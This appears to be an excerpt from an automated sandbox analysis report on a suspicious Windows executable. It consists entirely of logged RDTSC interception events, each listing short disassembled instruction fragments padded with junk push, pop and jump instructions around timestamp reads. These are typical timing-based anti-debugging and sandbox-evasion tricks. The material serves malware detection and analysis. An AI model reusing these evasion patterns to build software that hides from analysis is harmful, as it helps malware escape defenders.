Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 785342 second address: 785347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 785347 second address: 78534D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78534D second address: 78537B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F772874F63Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jnc 00007F772874F636h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnl 00007F772874F63Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 783927 second address: 78392D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78392D second address: 783957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F772874F645h 0x0000000a push edx 0x0000000b jmp 00007F772874F63Ch 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7891DB second address: 7891E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7891E1 second address: 7891E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7891E7 second address: 7891F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F77291E5956h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78CCFB second address: 78CCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78CCFF second address: 78CD03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78CD03 second address: 78CD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F772874F642h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78CD1F second address: 78CD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F77291E595Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78CD31 second address: 78CD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78CD3C second address: 78CD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78F982 second address: 78F987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78F987 second address: 78F99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E5960h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78F99D second address: 78F9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 79648F second address: 796495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 796495 second address: 7964C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F772874F644h 0x00000008 jmp 00007F772874F63Fh 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7964C6 second address: 7964CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7B9E4A second address: 7B9E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7B9E4E second address: 7B9E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7B9E54 second address: 7B9E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F772874F645h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F772874F636h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7B9E7F second address: 7B9E8D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F77291E5956h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7B9E8D second address: 7B9E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7B9E99 second address: 7B9EA3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F77291E5956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BA22F second address: 7BA233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BA233 second address: 7BA23B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BA23B second address: 7BA245 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F772874F63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BAE0D second address: 7BAE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F77291E5956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BAE17 second address: 7BAE1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BE0C5 second address: 7BE0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007F77291E5963h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BE0E1 second address: 7BE101 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F772874F64Ah 0x00000008 jmp 00007F772874F644h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BE101 second address: 7BE115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jp 00007F77291E5956h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BE115 second address: 7BE13B instructions: 0x00000000 rdtsc 0x00000002 js 00007F772874F650h 0x00000008 jmp 00007F772874F648h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7BDCAD second address: 7BDCB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7CA01E second address: 7CA028 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F772874F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7CA028 second address: 7CA05E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5967h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F77291E5968h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7CC699 second address: 7CC6A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7CC6A1 second address: 7CC6AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F77291E5956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7CC6AC second address: 7CC6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7CEA30 second address: 7CEA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7D0D99 second address: 7D0D9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7D0D9E second address: 7D0DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F77291E5966h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7D0DBF second address: 7D0DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7D0DC3 second address: 7D0DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F77291E5967h 0x0000000f pushad 0x00000010 jmp 00007F77291E5962h 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7D0DFB second address: 7D0E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7DF7DB second address: 7DF7EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F77291E5956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7E175E second address: 7E177D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F772874F636h 0x0000000a pop edx 0x0000000b jmp 00007F772874F63Ah 0x00000010 pop edi 0x00000011 je 00007F772874F644h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FA6E6 second address: 7FA6F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F77291E5956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FA883 second address: 7FA889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FA889 second address: 7FA88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FA88D second address: 7FA8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F772874F63Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FA9E9 second address: 7FAA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F77291E595Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FAA00 second address: 7FAA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FAA05 second address: 7FAA2E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F77291E5969h 0x00000008 je 00007F77291E5962h 0x0000000e jng 00007F77291E5956h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FAF3A second address: 7FAF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FAF3F second address: 7FAF44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB0B0 second address: 7FB0CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Eh 0x00000007 jp 00007F772874F636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB0CE second address: 7FB0D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB0D2 second address: 7FB0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB0DA second address: 7FB104 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F77291E595Dh 0x00000008 jmp 00007F77291E5966h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB104 second address: 7FB10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB23A second address: 7FB240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB240 second address: 7FB244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB244 second address: 7FB24F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB24F second address: 7FB258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB258 second address: 7FB266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E595Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FB4E4 second address: 7FB4EE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F772874F636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FE3D2 second address: 7FE3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E595Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7FE3E0 second address: 7FE427 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F648h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F772874F63Bh 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F772874F644h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 80109C second address: 8010A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 801371 second address: 80137C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F772874F636h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 80137C second address: 8013D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D3505h], esi 0x00000010 add dword ptr [ebp+124692D8h], eax 0x00000016 push dword ptr [ebp+1245E05Ch] 0x0000001c mov dx, 930Eh 0x00000020 call 00007F77291E5959h 0x00000025 push ecx 0x00000026 je 00007F77291E5958h 0x0000002c pushad 0x0000002d popad 0x0000002e pop ecx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007F77291E5969h 0x00000038 jng 00007F77291E5956h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA00F0 second address: 4EA010D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA010D second address: 4EA0189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bx, D262h 0x0000000f pushfd 0x00000010 jmp 00007F77291E5963h 0x00000015 jmp 00007F77291E5963h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F77291E5966h 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 call 00007F77291E595Eh 0x0000002a push eax 0x0000002b pop ebx 0x0000002c pop eax 0x0000002d mov eax, edx 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 movzx eax, bx 0x00000037 mov al, bl 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0189 second address: 4EA0192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 85DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80E91 second address: 4E80EC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F77291E5966h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bx, 95D4h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80EC0 second address: 4E80EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80EC6 second address: 4E80EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 jmp 00007F77291E5965h 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F77291E595Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0EE0 second address: 4EC0EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F772874F641h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0EF5 second address: 4EC0EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0EF9 second address: 4EC0F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0F07 second address: 4EC0F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0F0E second address: 4EC0F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0F29 second address: 4EC0F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0F2D second address: 4EC0F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0F33 second address: 4EC0F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0F39 second address: 4EC0F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0F3D second address: 4EC0F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E600AB second address: 4E600AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E600AF second address: 4E600B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
